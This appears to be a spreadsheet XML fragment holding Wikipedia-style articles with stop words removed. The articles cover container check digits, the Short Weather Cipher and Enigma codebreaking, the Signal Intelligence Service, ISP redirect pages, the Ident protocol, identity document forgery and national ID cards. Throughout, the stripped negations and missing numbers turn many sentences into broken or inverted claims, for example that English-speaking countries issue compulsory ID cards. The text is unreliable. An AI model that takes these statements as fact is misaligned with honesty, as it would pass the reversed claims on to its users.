calculation step final difference check digit becomes ensure happen standard recommends serial numbers used produce final difference however, containers market follow recommendation, handling case included check digit calculator programmed. notice step (ii) calculation remainder found division most programming languages modulo operator this. attention paid works language chosen; gives back decimal rest integer rest order proper results. used divisor container number letters digits total. step numbers left multiples divisor. example practical problems day-to-day business happens containers appear follow 6346 identification all; however, fully safety approved containers. usually "shippers owned" containers (soc), means owned carrier supplied cargo owners (shippers). they registered owner code category identifier check digit. advisable follow 6346 absence compliant identification code causes problems carriers container terminals correctly identify equipment properly deliver cargo, computer systems require 6346-conforming naming missing prefixes invented. example, yyyy carrier xxxx terminal causes equipment mismatch. moreover, since 6346 identification become requirement international customs conventions (customs conventions containers istanbul convention), many customs administrations begun validating containers marked standard. size type codes codes compiled following elements: first character, representing length (coded) second character, representing width height (coded) third fourth character indicating type containerthe following overview common codes: calculate size/type less commonly used 6346 containers: country code (optional) country code consists capital letters latin alphabet described 3166. indicates country code registered nationality owner operator container. letters code shall less (3.9 high. mandatory operational marks operational marks intended solely convey information requested movement containers give visual warnings. they relate weight containers symbol denote air-surface container sign warning overhead electrical danger height marks containers higher 2,590 also standard carrier alpha code wagon numbersthe following list freight container related specifications, article assigned (you help improve wikipedia start one): freight containers classification, dimensions ratings freight containers terminology 1161 freight containers corner fittings specification 1496 freight containers specification testing 2308 hooks lifting freight containers tons capacity basic requirements 3874 freight containers handling securing 8323 freight containers air/surface (intermodal) general purpose containers specification tests 9669 freight containers interface connections tank containers 9711 freight containers information related containers board vessels 9897 container equipment data exchange (cedex) 10368 freight thermal containers remote condition monitoring 10374 freight containers automatic identification references notes sourcesbureau international containers: containers bic-code (printed brochure) container numbering guide external links bureau international containers (bic) intermodal check digit calculator code identifier freight container check digit calculator (includes java source code download *static java method convert "10" check digit "0") itco technical questions list owner codes (not official site) online check digit calculator russian maritime register shipping representation container numbers validator container dimensions type code cargo container validator 6346 javascript container number validation application this page fails container zero check digit 2020) command line application generate validate container numbers.</t>
  </si>
  <si>
    <t>Short Weather Cipher</t>
  </si>
  <si>
    <t>short weather cipher (german: wetterkurzschlüssel, abbreviated wks), also known weather short signal book, cipher, presented codebook, used radio telegraphists aboard u-boats german navy (kriegsmarine) world used condense weather reports short 7-letter message, enciphered using naval enigma transmitted radiomen intercept stations shore, deciphered enigma 7-letter weather report reconstructed. history during world various times, different versions cipher operation. first issue carried codename weimar. replaced edition eisenach january 1942. march 1943, third edition weather key, bearing codename naumburg, entered force. 1941, operation primrose, operation occupy åndalsnes create diversion south trondheim norway part norwegian campaign, intact naval enigma (m3) cipher machine, copy "weimar" version short weather cipher copy short signal book (german: kurzsignalbuch kurzsignale short) recovered submarine u-110, captured north atlantic east cape farewell, greenland. this enabled cryptanalysts bletchley park break encryption decipher german submarine radio messages. short weather cipher critical cryptanalysis naval enigma yielded excellent cribs. october 1942, copy wetterkurzschlüssel, short weather cipher, short signal book, kurzsignale, recovered part daring raid u-boat u-559, three royal navy sailors, lieutenant anthony fasson, able seaman colin grazier naafi canteen assistant tommy brown, boarded abandoned submarine, recovered documents 90-minute search. they reached government code cypher bletchley park three-week delay, november 1942. documents cost lives fasson grazier proved particularly important breaking naval enigma version short weather cipher recovered eisenach version. unlike first version weimar, eisenach list rotor positions indicated letter, used enciphering weather reports. thus, cryptanalysts thought four rotors used encipher weather reports. testing bombes began surface weather kisses (identical messages cryptosystems). december 1942, crib obtained using short weather cipher gave naval enigma rotatable umkehrwalze (reversing roller reflector) neutral position, making equivalent standard enigma thus making b-dienst messages potentially breakable existing bombes. learned 4-letter indicators regular u-boat messages 3-letter indicators weather messages day, except extra letter. this meant found weather message day, fourth rotor tested positions find full 4-letter key. sunday december, rodger winn submarine tracking room bletchley park knew shark enigma cipher broken. when third edition short signal book introduced march 1943, immediately deprived cribs. however, march, cribs used personnel, using method employing short signal sighting reports. these reports made u-boats contact made kurzsignalheft code book. managed solve shark days june. kurzsignalheft short sighting reports also used mode. june, four-rotor bombes entered service bletchley park, august introduced navy. from september onwards, shark generally solved within hours. operation u-boat encoded weather reports using short weather cipher, enciphered naval enigma. shore patrol kriegsmarine, deciphered message decoded forwarding central meteorological station, rebroadcast data ship synoptics, enciphering additive tables using cipher, called germet personnel. short weather cipher coded weather reports using polyphonic single-letter code missing.a +28° +27° +26° +25° =−1° =−2° −21° similar way, water temperature, atmospheric pressure, humidity, wind direction, wind velocity, visibility, degree cloudiness, geographic latitude, geographic longitude coded prescribed order weather report consisted single short word. based approximate knowledge position submarine, kriegsmarine telegraphist received message could translate letter "s", according table, could mean back correct temperature. similarly, direction type swell also coded single letter: ----------------------------------------------------- direction type swell swell comes middle high high ----------------------------------------------------- swelling intermittent example cipher, weather report north latitude, west longitude (north iceland) atmospheric pressure millibars, temperature minus wind northwest force beaufort scale), 3/10 cirrus cloud cover, visibility nautical miles, would coded mznfped. publications bauer, arthur (1997), funkpeilung alliierte waffe gegen deutsche u-boote 1939–1945 [direction finding allied weapon german submarines 1939 1945] german), diemen, selbstverlag, isbn 978-3-00-002142-8 bauer, friedrich (2007), decrypted secrets. methods maxims cryptology (4., rev. extended ed.), berlin heidelberg york: springer, isbn 978-3-540-24502-5 pfeiffer, paul (october 1998), "breaking german weather ciphers mediterranean detachment, 849th signal intelligence service", cryptologia, (4): 354–369, doi:10.1080/0161-119891886975, issn 0161-1194 ulbricht, heinz (2005), chiffriermaschine enigma trügerische sicherheit. beitrag geschichte nachrichtendienste [the enigma cipher machine deceptive security. contribution history intelligence services], dissertation, fachbereich mathematik informatik, technische universität braunschweig german) references</t>
  </si>
  <si>
    <t>Signal Intelligence Service</t>
  </si>
  <si>
    <t>signal intelligence service (sis) united states army codebreaking division world founded 1930 compile codes army. renamed signal security agency 1943, september 1945, became army security agency. headquartered arlington hall (former campus arlington hall junior college women), arlington boulevard arlington, virginia, across potomac river washington (d.c.). during world became known army security agency, resources reassigned newly established national security agency (nsa). history signal intelligence service part u.s. army signal corps world time signal corps bureau headquarters, department army, addition branch army personnel commissioned appointed. signal corps supplied army communications photography equipment services among things. signal corps also trained personnel signal units service forces field. evolution activities signal intelligence service world discussed detail chapter "signal, security, intelligence," (pp. 327–350) signal corps: outcome, official history signal corps.chapters (pp. 4–25) army field manual 11-35, 1942, describe organization signal intelligence service department forces field functions performed units. that manual marked "restricted" issued. william friedman began division three "junior cryptanalysts" april 1930. their names frank rowlett, abraham sinkov, solomon kullback. before this, three mathematics teachers none cryptanalysis background. friedman geneticist developed expertise cryptology george fabyan's riverbank laboratories cipher department 1915 1917, prior world besides breaking foreign codes, responsible anything u.s. department war's code systems. initially worked extremely limited budget, lacking equipment needed analysts could intercept messages practice decrypting. organization grew rapidly organized efforts made recruit bright women. war, staff, 7,000 total 10,500, female. caracristi, would later become deputy director national security agency, started career prolific breaker japanese army codes. unit worked largely staffed women, produced flow intercepts "2468" shipping code system resulted sinking two-thirds japanese merchant marine. midway world 1943, army signal intelligence service (later army security agency) began intercepting soviet (russian) intelligence traffic sent mainly york city; assigned code name "venona" project. although united states become allies soviet union 1941, many officials suspicious communist government society. 1945, 200,000 messages transcribed, measure soviet activity. december 1946, time increasing tensions soviet union, meredith gardner made first break venona code. decrypted messages revealed existence soviet espionage alamos national laboratory work top-secret manhattan project, atomic bomb developed research continued. venona project highly classified, however, government never introduced evidence messages court proceedings prosecution alleged espionage agents. intercept network army intercept network wwii fixed stations, concentrated japanese military signals axis diplomatic traffic. vint hill farms station, warrenton, virginia rock ranch, petaluma, california fort shafter, territory hawaii fairbanks, alaska delhi, india asmara, eritrea also signals intelligence op-20-g united states coast guard unit national defence radio establishment references external links pearl harbor review. signal intelligence service, national security agency/central security service. nsa.gov. bernard weisberger "eavesdropping rising sun", american heritage magazine. budiansky, stephen, battle wits: complete story codebreaking world free press, 2000. стр.357 isbn 978-0-684-85932-3. william friedman, brief history signal intelligence service," june 1942, 029, files. anon. "centralized control u.s. army signal intelligence activities," srh-276, files. anon., "memorandum" o.c.s.o conference, july 1929. anon., "the second signal service battalion," srh-135, files. u.s. army signals intelligence world documentary history. edited james gilbert john finnegan, center military history, united states army. washington, 1993. isbn 0-16-037816-8. robert hanyok. eavesdropping hell: historical guide western communications intelligence holocaust, 1939–1945, series volume center cryptologie history. national security agence. 2004.</t>
  </si>
  <si>
    <t>ISP redirect page</t>
  </si>
  <si>
    <t>redirect page spoof page served major isps including: communications, embarq, verizon, rogers, earthlink, various others world wide users enter invalid name. user types incorrect uniform resource locator (url), example http://wikipedia.orf instead http://wikipedia.org, isp's server respond spoofed response redirects user advertising page. works domain name system (dns) resolution process translating human-readable domain name (for example, en.wikipedia.org) address computers use. every runs server allow customers translate domain names addresses computers understand use. when isp's server receives request translate name, according server return associated address customer's computer able connect requested resource. when isp's server receives request name recognized unavailable, isps spoof (null) response instead return address search advertising page client. when client using browser, display search page contains possible suggestions proper address small explanation error. these search pages often contain advertising paid isp. sometimes, customer opt-out service, opt-out frequently implemented layer spoofing. opt-out procedures vary method implementation effectiveness. consequences isps written redirect pages intended help lost users. customers complained pages instead misleading users, purpose generate advertising revenue isp. practice controversial since redirect pages introduced 2006.isp redirects fool ping networking utility. ping falsely report website responsive truth unavailable redirected. redirects also interfere archiving tools like archiveteam warrior references external links news article redirection service external image looks like</t>
  </si>
  <si>
    <t>Ident protocol</t>
  </si>
  <si>
    <t>ident protocol (identification protocol, ident), specified 1413, internet protocol helps identify user particular connection. popular daemon program providing ident service identd. function ident protocol designed work server daemon, user's computer, receives requests specified port, generally 113. query, client specifies pair ports local remote port), encoded ascii decimals separated comma (,). server sends response identifies username user runs program uses specified pair ports, specifies error. suppose host wants know name user connecting port (telnet) client's (host port 6191. host would open connection ident service host issue following query: 6191, connections generally unique local port (6191 case), host unambiguously identify program initiated specified connection host port exist. host would issue response, identifying user ("stjohns" example) owns program initiated connection name local operating system: 6193, userid unix stjohns would turn connection exists host would instead issue error response: 6195, error no-user ident messages delimited line sequence consisting carriage return linefeed characters (cr+lf). usefulness ident dialup hosts shared shell servers often provide ident enable abuse tracked back specific users. case abuse handled host concern trusting ident daemon mostly irrelevant. spoofing service privacy concerns avoided providing varying cryptographically strong tokens instead real usernames. abuse handled administrators service users connect using ident providing host, ident service must provide information identifying user. usually impossible administrators remote service know whether specific users connecting trustable server computer control. latter case ident service provides reliable information. usefulness ident proving known identity remote host limited circumstances when: user connecting administrator machine. this likely hosts providing unix shell access, shared servers using suexec-like construction like. trusts administrators machine knows user policy. this likely hosts common security domain within single organization. trusts machine machine claims knows machine. this easily arranged hosts local area network virtual network hosts network trusted hosts cannot easily added physical protection. remote normal local networks false ident replies accomplished spoofing and, used, kinds trickery. ident daemon provide cryptographically signed replies which, confirmed, solves last, first, concerns. there exist intermediate obstacles connecting identd firewall, nat, proxy (such using ident apache httpd). these common occurrences going security domains public http servers). security ident protocol considered dangerous allows crackers gain list usernames computer system later used attacks. generally accepted solution generic/generated identifier, returning node information even gibberish (from requesters point view) rather usernames. this gibberish turned real usernames ident administrator, contacted possible abuse, means usefulness tracking abuse preserved. uses ident important large number people connect server shared multiple users, often using bouncer. without ident would single user without banning entire host. server administrator also information identify abusive user. networks, server fails ident response falls back username given client, marks "not verified", usually prefixing tilde; e.g., ~josh. some servers even blocking clients without ident response, main reason makes much harder connect "open proxy" system compromised single account form root unix-like systems, root listen network connections ports 1024). however, ident provides additional authentication user connecting directly personal computer, enough privileges control ident daemon well. software oidentd (for unix-like systems) retina scan identd (for windows; supports multiple users similar unix identd) windows ident server. also smtp nntp socks proxies (socks) references further reading authentication service authentication server daniel bernstein: internet draft, june 1992 daniel bernstein: tap? white paper, 1992-08-20 1413 identification protocol 1414 identification peter eriksson: tapvsident, 1993-11-03 damien doligez: encrypt ident/tap replies?, 1994-02-22</t>
  </si>
  <si>
    <t>Identity document forgery</t>
  </si>
  <si>
    <t>identity document forgery process identity documents issued governing bodies copied and/or modified persons authorized create documents engage modifications, purpose deceiving would view documents identity status bearer. term also encompasses activity acquiring identity documents legitimate bodies falsifying required supporting documentation order create desired identity.identity documents differ credentials intended usable person holding card. unlike credentials, used restrict activities holder well expand them. documents forged include driver's licenses (historically forged altered attempt conceal fact persons desiring consume alcohol legal drinking age); birth certificates social security cards (likely used identity theft schemes defraud government); passports (used evade restrictions entry particular country). beginning 2010, million stolen lost passports listed global database interpol.such falsified documents used identity theft, deception, illegal immigration, organized crime, espionage. scenarios, forgery techniques security countermeasures distinction needs made different uses identity document. cases, fake pass cursory inspection, flashing plastic card security guard. extreme, document resist scrutiny trained document examiner, equipped technical tools verifying biometrics reading hidden security features within card. make forgery difficult, modern contain numerous security features require specialised expensive equipment duplicate. school typically easier fake, often level security measures government-issued ids. fake cards ordered internet examples include national identification card provisional motorcycle licence. offence section forgery counterfeiting 1981. there number different types false documents using another person's genuine document altered, form exist copy made. modern fake cards almost invariably carry picture authorized user, simple effective form biometric identification. however, forgery basic photographic cards become simple recent years availability low-cost high-resolution printers, scanners photo-editing software. basic fake cards commonly made using inkjet laser printer print replica document laminated resemble real card. most designs made using computer programs, re-creating scanned copies license. more complex cards created printing material called teslin artisyn, paper-like materials actually micro-porous plastic sheets. when butterfly pouches holograms applied, card heat laminator, creating professional-looking card. numerous security printing techniques used attempt enhance security cards. example, many modern documents include holograms, difficult replicate without expensive equipment generally available. though accurate recreation holograms extremely difficult, using mixture pigments base create similar shiny multi-colored look pass cursory inspection. another form document security uv-light visible ink.in addition, documents include magnetic strip, contains similar information printed card. data thus checked data card, printed information machine-readable barcode. magnetic strips also contain secret identifying information. although magnetic strips also faked, provide another barrier entry amateur forger. other hidden security devices also added, including embedded secure cryptoprocessor chips designed difficult forge, rfid tags⁠ ⁠the technologies also combined, case contactless smart cards. another effective technique online verification security information central database. many cases, online verification detect simple copying document detecting attempted multiple places time, completely false ids, information found invalid. simple method confirming genuine print serial number unique card stored centralized database. checked, quickly become clear false; either number registered holder, number all. online verification also advantage allows easy revocation lost stolen documents. using verifiable credentials another effective method detect forgery. digital representation (such code) cardholder's information cryptographically signed issuer. information match information verifiable credential, digital signature verifiable credential match provided legitimate issuer, false. issuer choose digital signature ids, digital signature latter option allows revocation single without also revoking ids. security method depends various factors, including ability issuer protect private keys algorithm used cryptographically sign verifiable credential.many modern credentials contain kind barcode. example, many u.s. driving licences include 2-dimensional code pdf417 format, contains information front license. barcodes allow rapid checking credentials low-security applications, potentially contain extra information used verify information card. systemic attacks combination multiple high-security features, biometrics, well-trained document inspectors technical assistance effective preventing forged documents easily produced. instead acquiring expensive specialized equipment needed make fake documents, economical produce "genuine fake"⁠ legitimate document, contains false information. present document issuing authority false credentials, endorse issuing document. way, false identities credentials "bootstrapped" period time. another simpler generating false credentials suborn officials involved document-issuing process bribery intimidation. this also combined bootstrapping process mentioned mount complex attacks. corruption document-issuing process hard counter, since value credential increases, economic incentives corruption also increase. this particularly true case fake cards combine many functions document, documents issued large numbers, thus requiring many thousands people authorizing powers, thus creating longer chain people possibly exploited. detection "genuine fake" document also difficult process; fake legitimate document, pass tests forgery. detect fakes, necessary perform background check individual question confirm legitimacy document's information. also card printer outline forgery references</t>
  </si>
  <si>
    <t>Identity document</t>
  </si>
  <si>
    <t>identity document (also called colloquially papers) document used prove person's identity. issued small, standard credit card size form, usually called identity card (ic, card, citizen card), passport card. some countries issue formal identity documents, national identification cards compulsory non-compulsory, others require identity verification using regional identification informal documents. when identity document incorporates person's photograph, called photo id.in absence formal identity document, driver's license accepted many countries identity verification. some countries accept driver's licenses identification, often countries expire documents easily forged. most countries accept passports form identification. some countries require people identity document available times. many countries require foreigners passport occasionally national identity card home country available time residence permit country. identity document used connect person information person, often database. connection identity document database based personal information present document, bearer's full name, age, birth date, address, identification number, card number, gender, citizenship more. unique national identification number secure way, countries lack numbers show identity documents. history version passport considered earliest identity document inscribed introduced king henry england safe conducts 1414.for next years onset first world war, people need identity document. photographic identification appeared 1876 become widely used early 20th century photographs became part passports documents driver's licenses, came referred "photo ids". both australia great britain, example, introduced requirement photographic passport 1915 so-called lody scandal.the shape size identity cards standardized 1985 iso/iec 7810. some modern identity documents smart cards include difficult-to-forge embedded integrated circuit standardized 1988 iso/iec 7816. technologies allow identity cards contain biometric information, photograph, face; hand, iris measurements; fingerprints. many countries issue electronic identity cards. adoption enforcement officials claim identity cards make surveillance search criminals easier therefore support universal adoption identity cards. countries national identity card, concern projected costs potential abuse high-tech smartcards. many countries especially english-speaking countries australia, canada, ireland, zealand, united kingdom, united states government-issued compulsory identity cards citizens. ireland's public services card considered national identity card department employment affairs social protection (deasp), many fact becoming that, without public debate even legislative foundation.there debate countries whether cards centralised databases constitute infringement privacy civil liberties. most criticism directed towards possibility abuse centralised databases storing sensitive data. 2006 survey open university students concluded planned compulsory identity card identity cards 2006 coupled central government database generated negative response among several options. none countries listed mandate identity documents, facto equivalents since countries still require proof identity many situations. example, vehicle drivers must driving licence, young people need specially issued "proof cards" purchasing alcohol. arguments arguments identity documents such: order avoid mismatching people fight fraud, secure prove person's identity. every human already carries personal identification form dna, extremely hard falsify discard terms modification). even non-state commercial private interactions, shortly become preferred identifier, rendering state-issued identity card lesser evil potentially extensive privacy risks associated everyday person's genetic profile identification purposes.arguments national identity documents: using private alternatives, cards issued banks, inherent lack consistency regarding issuance policies lead downstream problems. example, sweden private companies banks (citing security reasons) refused issue cards individuals without swedish card swedish passport. this forced government start issuing national cards. also harder control information usage private companies, credit card issuers social media companies purchase behaviour order assist targeting. arguments arguments identity documents such: development administrative costs identity card system high. figures ($45 united states) even higher suggested abandoned card. countries chile identity card paid person countries, france venezuela, card free. this, however, disclose true cost issuing cards additional portion borne taxpayers general.arguments national identity documents: rather relying government-issued cards, u.s. federal policy encourages variety identification systems already exist, driver's firearms licences private cards.arguments overuse abuse identity documents: cards reliant centralized database used track someone's physical movements private life, thus infringing personal freedom privacy. proposed british card proposes series linked databases managed private sector firms. management disparate linked systems across range institutions number personnel alleged security disaster making. race displayed mandatory documents, information lead racial profiling. national policies according privacy international, 1996, possession identity cards compulsory countries, though constitutes "compulsory" varies. countries (see below), compulsory identity card person reaches prescribed age. penalty non-possession usually fine, cases result detention identity established. people suspected crimes shoplifting ticket, non-possession might result detention, also countries formally requiring identity cards. practice, random checks rare, except certain times. number countries national identity cards. these include andorra, australia, bahamas, canada, denmark, india (see below), japan (see below), kiribati, marshall islands, nauru, zealand, palau, samoa, turkmenistan, tuvalu, united kingdom. other identity documents passports driver's licenses used identity documents needed. however, governments kiribati samoa planning introduce national identity cards near future some these, e.g. denmark, simple official identity cards, match security level acceptance national identity card, used people without driver's licenses. number countries voluntary identity card schemes. these include austria, belize, finland, france (see france section), hungary (however, citizens hungary must least valid passport, photo-based driving licence, national card), iceland, ireland, norway, saint lucia, sweden, switzerland united states. united kingdom's scheme scrapped january 2011 database destroyed. united states, federal government issues optional identity cards known "passport cards" (which include important information nationality). hand, states issue optional identity cards people hold driver's license alternate means identification. these cards issued organisation responsible driver's licenses, usually called department motor vehicles. passport cards hold limited travel status provision, usually domestic travel requirements. note, obligatory identification card citizens. sahrawi people western sahara, pre-1975 spanish identity cards main proof saharawi citizens opposed recent moroccan colonists. they would thus allowed vote eventual self-determination referendum. companies government departments issue cards security purposes, proof identity, proof qualification. example, taxicab drivers carry cards. managers, supervisors, operatives construction photographic card, cscs (construction skills certification scheme) card, indicating training skills including safety training. those working railway lands near working lines must carry photographic card indicate training track safety (pts cards) possession dependent periodic random alcohol drug screening. queensland western australia, anyone working children take background check issued blue card working children card, respectively. africa liberia liberia begun issuance process national biometric identification card, citizens foreign residents open bank accounts participate government services daily basis. more million people expected register obtain cards citizenship residence liberia. project already started (national identification registry) issuing citizen national cards. centralized national biometric identification system (nbis) integrated government ministries. resident cards ecowas cards also issued. cape verde cartão nacional identificação (cni) national identity card cape verde. egypt compulsory egyptian citizens older possess card (arabic: بطاقة تحقيق شخصية biṭāqat taḥqīq shakhṣiyya, literally, "personal verification card"). daily colloquial speech, generally simply called "el-biṭāqa" ("the card"). used for: opening closing bank account registering school university registering number mobile landline telephone interacting government agencies, including: applying renewing driver's license applying passport applying social services grants registering vote, voting elections registering taxpayeregyptian cards consist digits, national identity number, expire years date issue. some feel egyptian cards problematic, general poor quality card holders' photographs compulsory requirements card holders identify religion married women include husband's name cards. tunisia every citizen tunisia expected apply card however, approval parent(s), tunisian citizen apply for, receive, card prior eighteenth birthday upon parental request.in 2016, government introduced bill parliament issue biometric documents. bill created controversy amid civil society organizations. gambia gambian citizens years required hold gambian national identity card. july 2009, biometric identity card introduced. biometric card acceptable documents required apply gambian driving licence. ghana ghana begun issueing national identity card ghanaian citizens 1973. however, project discontinued three years later problems logistics lack financial support. this first time idea national identification systems form ghana card arose country. full implementation ghana cards begun 2006. according national identification authority, million ghanaians registered ghana card september 2020. mauritius mauritius requires citizens reached apply national identity card. national identity card accepted forms identification, along passports. national identity card needed apply passport adults, minors must take national identity card parent(s) applying passport. mozambique bilhete identidade (bi) national card mozambique. nigeria nigeria first introduced national identity card 2005, adoption back limited widespread. country process introducing biometric card complete smartcard security features. national identity management commission (nimc) federal government agency responsible issuance cards, well management national identity database. federal government nigeria announced april 2013 next general election 2015, subsequent elections require voters eligible stand office vote provided citizen possesses nimc-issued identity card. central bank nigeria also looking instructing banks request national identity number (nin) citizen maintaining account banks operating nigeria. proposed kick date determined. south africa south african citizens aged years months older eligible card. south african identity document valid travel document valid outside south africa. although carrying document required daily life, necessary show document certified copy proof identity when: signing contract, including opening closing bank account registering school university buying mobile phone registering number interacting government agencies, including applying renewing driving licence firearm licence applying passport applying social services grants registering vote, voting elections registering taxpayer unemployment insurancethe south african identity document used also contain driving firearms licences; however, documents issued separately card format. 2013 smart card launched replace book. cards launched july 2013, number dignitaries received first cards ceremony pretoria. government plans books phased eight-year period. south african government looking possibly using smart card identification card also licences, national health insurance, social grants. zimbabwe zimbabweans required apply national registration zimbabwean citizens issued plastic card contains photograph particulars onto before introduction plastic card, zimbabwean card used printed anodised aluminium. along driving licences, national registration card (including metal type) universally accepted proof identity zimbabwe. zimbabweans required carry identification times visitors zimbabwe expected carry passport times. asia afghanistan afghan citizens required carry national document called tazkira. bahrain bahraini citizens must card, called "smart card", recognized official document used within gulf cooperation council, passport, recognized worldwide. bangladesh biometric identification existed bangladesh since 2008. bangladeshis years older included central biometric database, used bangladesh election commission oversee electoral procedure bangladesh. bangladeshis issued card used obtain passport, driving licence, credit card, register land ownership. bhutan bhutanese national identity card (called buthanese citizenship card) electronic card, compulsory bhutanese nationals costs bhutanese ngultrum. china people's republic china requires citizens aged carry identity card. card acceptable legal document obtain employment, residence permit, driving licence passport, open bank accounts apply entry tertiary education technical colleges. hong kong hong kong identity card hkid) official identity document issued immigration department hong kong people hold right abode, right land forms limited stay longer days hong kong. according basic hong kong, permanent residents eligible obtain hong kong permanent identity card states holder right abode hong kong. persons aged must carry valid legal government identification document public. persons aged must able produce valid legal government identification documents requested legal authorities; otherwise, held detention investigate identity legal right hong kong. india while mandatory identity card india, aadhaar card, multi-purpose national identity card, carrying personal details unique identification number, available citizens since 2007. card contains photograph, full name, date birth, unique, randomly generated 12-digit national identification number. however, card rarely required proof, number copy card sufficient. card scosta code embedded card, details card accessible. addition aadhaar, cards, ration cards, voter cards driving licences also used. these issued either government india government state, valid throughout nation. indian passport also used. indonesia residents required hold (kartu tanda penduduk) identity card. card identify whether holder indonesian citizen foreign national. 2011, indonesian government started two-year issuance campaign utilizes smartcard technology biometric duplication fingerprint iris recognition. this card, called electronic (e-ktp), replace conventional card beginning 2013. 2013, estimated approximately million indonesian nationals e-ktp issued them. iran every citizen iran identification document called shenasnameh (iranian identity booklet) persian (شناسنامه). this booklet based citizen's birth certificate features shenasnameh national number, birth date, birthplace, names, birth dates national numbers legal ascendants. pages shenasnameh, marriage status, names spouse(s), names children, date every vote cast eventually death would recorded.every iranian permanent resident must hold valid national identity card (persian:کارت ملی) least obtain unique national number local vital records branches iranian ministry interior.in order apply card, applicant must least years photograph attached birth certificate, undertaken vital records branch. since june 2008, cards compulsory many things iran iranian missions abroad (e.g., obtaining passport, driver's license, banking procedure, etc.). iraq every iraqi citizen must national card (البطاقة الوطنية). israel israeli requires every permanent resident whether citizen not, carry identification card called te'udat zehut (hebrew: תעודת זהות) hebrew biţāqat huwīya (بطاقة هوية) arabic. card designed bilingual form, printed hebrew arabic; however, personal data presented hebrew default presented arabic well owner decides card must presented official duty (e.g., policeman) upon request, resident unable this, contact relevant authority within five days avoid penalty. until mid-1990s, identification card considered legally reliable document many actions voting opening bank account. since then, israeli driver's licenses include photos extra personal information considered equally reliable transactions. situations government-issued photo passport military suffice. japan japanese citizens required identification documents within territory japan. when necessary, official documents, one's japanese driver's license, basic resident registration card, radio operator license, social insurance card, health insurance card passport generally used accepted. hand, mid- long-term foreign residents required carry zairyū cards, short-term visitors tourists (those temporary visitor status sticker passport) required carry passports. kuwait kuwaiti identity card issued kuwaiti citizens. used travel document visiting countries gulf cooperation council. macau macau resident identity card official identity document issued identification department permanent residents non-permanent residents. malaysia malaysia, mykad compulsory identity document malaysian citizens aged above. introduced national registration department malaysia september 2001, four malaysia flagship applications replacement high quality identity card (kad pengenalan bermutu tinggi), malaysia became first country world identification card incorporates photo identification fingerprint biometric data in-built computer chip embedded piece plastic. myanmar myanmar citizens required obtain national registration card (nrc), non-citizens given foreign registration card (frc). nepal biometric cards rolled 2018. information displayed english nepali. pakistan pakistan, adult citizens must register computerized national identity card (cnic), unique number, cnic serves identification document authenticate individual's identity citizen pakistan. earlier national identity cards (nics) issued citizens pakistan. now, government shifted existing records national identity cards (nic) central computerized database managed nadra. cnic's machine readable security features facial finger print information. 2013, smart national identity cards, snics, also made available. palestine palestinian authority issues identification cards following agreements israel. since 1995, accordance oslo accords, data forwarded israeli databases verified. february 2014, presidential decision issued palestinian president mahmoud abbas abolish religion field announced. israel objected abolishing religion palestinian controls official records, passports right make amendments effect without prior approval israel. palestinian authority ramallah said abolishing religion center negotiations israel since 1995. decision criticized hamas officials gaza strip, saying unconstitutional implemented gaza undermines palestinian cause. papua guinea e-national cards rolled 2015. philippines philippines identity card known philippine identification system (philsys) card began issued august 2018 filipino citizens foreign residents above. this national card non-compulsory harmonize existing government-initiated identification cards issued including unified multi-purpose issued members social security system, government service insurance system, philippine health insurance corporation home development mutual fund (pag-ibig fund). singapore singapore, every citizen, permanent resident (pr) must register identity card (ic). card necessary procedures state also day-to-day transactions registering mobile phone line, obtaining certain discounts stores, logging certain websites internet. schools frequently identify students, online exams. south korea every citizen south korea issued card called jumindeungrokjeung (주민등록증). several changes history, recent form plastic card meeting 7810 standard. card holder's photo digit number calculated holder's birthday birthplace. hologram applied purpose hampering forgery. this card additional features used identify holder, save photo. other card, south korean government accepts korean driver's license card, alien registration card, passport public officer card official card. lanka e-national identity card (abbreviation: e-nic) identity document lanka. compulsory lankan citizens sixteen years older nic. nics issued department registration persons. registration persons no.32 1968 amended 1971 no.11 1981 legislates issuance usage nics. lanka process developing smart card based rfid card replace obsolete 'laminated type' cards storing holders information chip read banks, offices, etc., thereby reducing need documentation data physically storing cloud. number used unique personal identification, similar social security number lanka, citizens need apply national identity card (nic). each unique digit number, format 000000000a (where digit letter). first digits number year birth (e.g.: 93xxxxxxxx someone born 1993). final letter generally 'x'. number required apply passport (over 16), driving license (over vote (over 18). addition, citizens required carry times proof identity, given security situation country. nics issued non-citizens, still required carry form photo identification (such photocopy passport foreign driving license) times. times postal card also used. taiwan "national identification card" (chinese: 國民身分證) issued nationals republic china (official name taiwan) aged older household registration taiwan area. identification card used virtually activities require identity verification within taiwan opening bank accounts, renting apartments, employment applications voting. identification card contains holder's photo, number, chinese name, (minguo calendar) date birth. back card also contains person's registered address official correspondence sent, place birth, name legal ascendants spouse any). residents move, must re-register municipal office (chinese: 戶政事務所). nationals household registration taiwan known "registered nationals". nationals household registration taiwan (known "unregistered nationals") qualify identification card associated privileges (e.g., right vote right abode taiwan), qualify republic china passport, unlike identification card, indicative residency rights taiwan. "unregistered nationals" residents taiwan, hold taiwan area resident certificate identity document, nearly identical alien resident certificate issued foreign nationals/citizens residing taiwan. thailand thailand, thai national card (thai: บัตรประจำตัวประชาชน; rtgs: pracham pracha chon) official identity document issued thai nationals. card proves holder's identity receiving government services entitlements. united arab emirates (uae) federal authority identity citizenship government agency responsible issuing national identity cards citizens (uae nationals), (gulf corporation council) nationals residents country. individuals mandated apply card ages. individuals years above, fingerprint biometrics fingerprints, palm, writer) captured registration process. each person unique 15-digit identification number (idn) person holds throughout his/her life. identity card smart card state-of-art technology smart cards field high security features make difficult duplicate. 144kb combi smart card, electronic chip includes personal information, fingerprints, 4-digit code, digital signature, certificates (digital encryption). personal photo, idn, name, date birth, signature, nationality, card expiry date fields visible physical card. used official identification document individuals benefit services government, non-government, private entities uae. this supports uae's vision smart government card used securely access e-services country. card could also used citizens official travel document countries instead using passports. implementation national program enhanced security individuals protecting identities preventing identity theft. vietnam vietnam, citizens years must possess citizen identification card provided local authority, must reissued citizens' years reach formerly people's document used. europe european economic area national identity cards issued citizens (european union, iceland, liechtenstein, norway) switzerland, states swiss citizenship, used identity document within home country, also travel document exercise right free movement switzerland.during presidency 2005 decision made "agree common standards security features secure issuing procedures cards (december 2005), detailed standards agreed soon possible thereafter. respect, presidency forward proposal eu-wide biometrics national identity cards".from august 2021, european identity card intended replace standardize various identity card styles currently use. austria austrian identity card issued austrian citizens. used travel document visiting countries plus efta) countries, europe's microstates, british crown possessions, albania, bosnia herzegovina, georgia, kosovo, moldova, montenegro, republic macedonia, north cyprus, serbia, montserrat, french overseas territories british crown possessions, organized tours jordan (through aqaba airport) tunisia. only around citizens austria card 2012,[2] austrian driver's licenses identity cards domestically widely accepted austrian passport abroad. belgium belgium, everyone issued identity card (carte d'identité french, identiteitskaart 